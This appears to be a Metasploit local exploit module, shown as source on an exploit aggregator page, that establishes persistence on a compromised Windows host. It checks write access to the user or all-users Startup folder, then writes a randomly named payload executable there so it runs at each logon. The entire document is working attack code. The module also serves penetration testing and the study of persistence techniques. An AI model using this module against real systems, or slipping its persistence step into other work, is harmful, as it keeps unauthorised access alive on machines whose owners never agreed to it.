Share
## https://sploitus.com/exploit?id=PACKETSTORM:211004
##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking
    
      include Msf::Post::File
      include Msf::Exploit::EXE
      include Msf::Exploit::Local::Persistence
      prepend Msf::Exploit::Remote::AutoCheck
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Windows Persistent Startup Folder',
            'Description' => %q{
              This module establishes persistence by creating a payload in the user or system startup folder.
              Works on Vista and newer systems.
            },
            'License' => MSF_LICENSE,
            'Author' => [ 'h00die' ],
            'Platform' => [ 'win' ],
            'SessionTypes' => [ 'meterpreter', 'shell' ],
            'Targets' => [
              [ 'Automatic', {} ]
            ],
            'DefaultTarget' => 0,
            'References' => [
              ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
              ['URL', 'https://support.microsoft.com/en-us/windows/configure-startup-applications-in-windows-115a420a-0bff-4a6f-90e0-1934c844e473']
            ],
            'DisclosureDate' => '1995-01-01', # windows 95
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
              'SideEffects' => [ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options(
          [
            OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
            OptEnum.new('CONTEXT', [false, 'Target current User or All Users (system)', 'USER', ['USER', 'SYSTEM'] ])
          ]
        )
      end
    
      def folder
        if datastore['CONTEXT'] == 'USER'
          f = session.sys.config.getenv('%userprofile%')
          f = "#{f}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
          return f
        end
        f = session.sys.config.getenv('%ProgramData%')
        "#{f}\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
      end
    
      def check
        f = folder
        begin
          # windows only ps payloads have writable? so try that first
          return CheckCode::Safe("Unable to write to #{f}") unless writable?(f)
        rescue RuntimeError
          filename = f + '\\' + Rex::Text.rand_text_alpha((rand(6..13)))
          write_file(filename, '')
          if exists? filename
            rm_f(filename)
            return CheckCode::Appears("Likely exploitable, able to write test file to #{f}")
          else
            return CheckCode::Safe("Unable to write to #{f}")
          end
        end
    
        CheckCode::Appears('Likely exploitable')
      end
    
      def install_persistence
        payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
        payload_exe = generate_payload_exe
        payload_pathname = folder + '\\' + payload_name + '.exe'
        vprint_good("Writing payload to #{payload_pathname}")
        fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
        vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_pathname}")
        @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
      end
    end